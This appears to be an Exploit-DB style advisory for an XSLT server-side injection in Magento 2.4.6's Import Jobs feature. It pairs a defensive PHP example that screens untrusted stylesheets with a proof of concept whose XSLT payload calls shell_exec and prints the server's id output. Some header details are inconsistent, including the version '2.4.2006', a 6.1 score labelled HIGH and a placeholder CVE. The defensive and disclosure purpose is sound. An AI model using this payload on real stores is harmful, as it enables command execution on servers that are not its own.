Vendor: Magento
By: tmrswrr
CVSS: 6.1 (HIGH)
Server Side Injection
CWE: 94
Product Name: Magento
Affected Version From: 2.4.2006
Affected Version To: 2.4.2006
Patch Exists: NO
Related CWE: CVE-2023-XXXX (example)
CPE: a:magento:magento:2.4.6
Metasploit:
Platforms Tested:
2023

Magento ver. 2.4.6 – XSLT Server Side Injection

An attacker can inject malicious XSLT code through the 'XSLT Configuration' option in the 'Import Jobs' feature of Magento version 2.4.6, allowing them to execute commands on the server. This vulnerability has a potential impact on the confidentiality, integrity, and availability of the system.

Mitigation:

To mitigate this issue, users should update to the latest version of Magento and avoid processing untrusted XSLT configurations. Additionally, restricting access to the affected functionality can also help prevent exploitation.
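
A stylesheet can call `php:function()` only when the PHP code driving the transform has called `XSLTProcessor::registerPHPFunctions()`. The following is an added example, not code from Magento, the import feature or the exploit author, showing how untrusted XSLT can be screened and processed with that bridge left off; the helper names `stylesheetUsesPhpBridge` and `safeTransform` are hypothetical and the sample stylesheets are constructed.

```php
<?php
declare(strict_types=1);
// Added example with hypothetical helper names; not Magento or extension code.
const PHP_XSL_NS = 'http://php.net/xsl'; // namespace behind php:function()

/** True if any element binds the PHP extension namespace, under any prefix. */
function stylesheetUsesPhpBridge(DOMDocument $xsl): bool
{
    // Query the parsed DOM so character references in the xmlns value cannot hide the URI.
    foreach ((new DOMXPath($xsl))->query('//namespace::*') as $ns) {
        if ($ns->nodeValue === PHP_XSL_NS) {
            return true;
        }
    }
    return false;
}

/** Transform $xmlSource with an untrusted stylesheet, with the PHP bridge off. */
function safeTransform(string $xslSource, string $xmlSource): string
{
    libxml_use_internal_errors(true);          // collect parse errors quietly
    $xsl = new DOMDocument();
    $xml = new DOMDocument();
    if (!$xsl->loadXML($xslSource, LIBXML_NONET) || !$xml->loadXML($xmlSource, LIBXML_NONET)) {
        throw new InvalidArgumentException('stylesheet or input is not well-formed XML');
    }
    if (stylesheetUsesPhpBridge($xsl)) {
        throw new InvalidArgumentException('stylesheet binds ' . PHP_XSL_NS);
    }
    $proc = new XSLTProcessor();
    // registerPHPFunctions() is never called, so php:function() stays disabled
    // even if the check above were bypassed. Security prefs also deny file/network reads.
    $proc->setSecurityPrefs(XSL_SECPREF_DEFAULT | XSL_SECPREF_READ_FILE | XSL_SECPREF_READ_NETWORK);
    if (!$proc->importStylesheet($xsl)) {
        throw new InvalidArgumentException('stylesheet failed to compile');
    }
    $out = $proc->transformToXml($xml);
    if (!is_string($out)) {
        throw new RuntimeException('transformation failed');
    }
    return $out;
}

// Constructed samples: one plain stylesheet, one binding the PHP namespace as "p".
$head = '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"';
$ok   = $head . '><xsl:template match="/"><xsl:value-of select="/r/n"/></xsl:template></xsl:stylesheet>';
$bad  = $head . ' xmlns:p="http://php.net/xsl"><xsl:template match="/"/></xsl:stylesheet>';
echo safeTransform($ok, '<r><n>widget</n></r>');
try { safeTransform($bad, '<r/>'); } catch (InvalidArgumentException $e) { echo $e->getMessage(), "\n"; }
```

The namespace check is the early rejection; leaving `registerPHPFunctions()` uncalled is the control that actually removes the command-execution path.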

Exploit-DB raw data:

# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection

**Date:** 2023-11-17
**Exploit Author:** tmrswrr
**Vendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
**Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)
**Version:** 2.4.6
**Tested on:** 2.4.6

## POC

1. Log in with admin credentials at this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Choose File as the Import Source
4. Click `XSLT Configuration` and write this payload:

   ```xml
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','id')" />
     </xsl:template>
   </xsl:stylesheet>
   ```

## RESULT

```
<?xml version="1.0"?>
uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)
```